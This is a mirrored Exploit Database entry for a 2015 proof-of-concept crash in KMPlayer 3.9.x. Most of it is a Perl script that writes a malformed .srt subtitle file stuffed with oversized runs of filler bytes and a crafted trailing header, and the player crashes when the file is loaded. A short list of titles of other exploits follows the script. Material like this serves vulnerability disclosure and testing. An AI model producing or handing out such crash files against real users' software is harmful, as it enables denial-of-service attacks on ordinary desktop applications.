KMPlayer 3.9.x – ‘.srt’ Crash (PoC)

Exploit Database
15 阅读

作者： Peyman Motevalli Manesh

日期： 2015-07-31
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/37717/

#!/usr/bin/perl -w
# Title : KMPlayer 3.9.x - Crash Proof Of Concept
# Company : http://www.kmplayer.com
# Tested : Windows 7 / Windows 8.1
#
#
# Author: Peyman Motevalli Manesh
# Linkedin: https://ir.linkedin.com/in/peymanmotevalli
# E-Mail: me[at]PDPnetwork[dot]ir 
# Website : www.PDPnetwork.ir
# FaceBook: https://www.facebook.com/Peyman.Motevalli
#
#
# 1 . run perl code : perl km.pl
# 2 . open "kmplayer"
# 3 . Load Subtitle (Peyman.srt)
# 4 . Crashed
$eheader="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14";
$h="\x42"x9850;
$poc="\x41"x500000;
$poc="$h$poc$eheader";
open (Peyman, '>Peyman.srt');
for ($i=1;$i<=4;$i++){
print Peyman "$i\n00:00:01,800 --> 00:00:05,500\n";
print Peyman $poc;
}
close (Peyman);

last Exploits
KMPlayer 3.9.x – ‘.srt’ Crash (PoC)的更多信息

Sysax Multi Server 6.40 – SSH Component Denial of Service：
Microsoft Windows XP/2000/2003 – ‘win32k.sys’ SfnINSTRING Local kernel Denial of Service：
libtiff 4.0.9 – Decodes Arbitrarily Sized JBIG into a Target Buffer：
TACK 1.07 – Local Stack Buffer Overflow：
Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) – ‘iowarrior’ Driver Crash (PoC)：
Adobe Acrobat Reader and Flash – ‘newfunction’ Remote Code Execution：
FTPGetter Professional 5.97.0.223 – Denial of Service (PoC)：
OPC Systems.NET 4.00.0048 – Denial of Service：